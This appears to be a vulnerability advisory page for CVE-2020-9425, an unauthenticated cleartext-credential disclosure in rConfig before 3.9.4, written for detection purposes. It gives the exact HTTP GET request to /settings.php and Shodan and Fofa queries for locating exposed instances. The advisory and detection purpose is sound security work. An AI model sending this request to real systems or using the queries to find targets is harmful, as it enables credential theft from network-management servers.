🔙 목록으로 돌아가기

CVE-2020-9425: rConfig <3.9.4 - Sensitive Information Disclosure

TitlerConfig <3.9.4 - Sensitive Information Disclosure
Authormadrobot
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords.
RemediationUpgrade rConfig to version 3.9.4 or later to fix the vulnerability.
CVSS Score7.5
EPSS Score0.49449
CVE IDCVE-2020-9425
CWE IDCWE-670
Shodan Queryhttp.title:"rconfig"
Fofa Querytitle="rconfig"
Tags cve cve2020 rconfig.exposure rconfig vuln

🔍 Vulnerability Description

rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.

🌐 HTTP Request

GET /settings.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-9425.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-9425.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A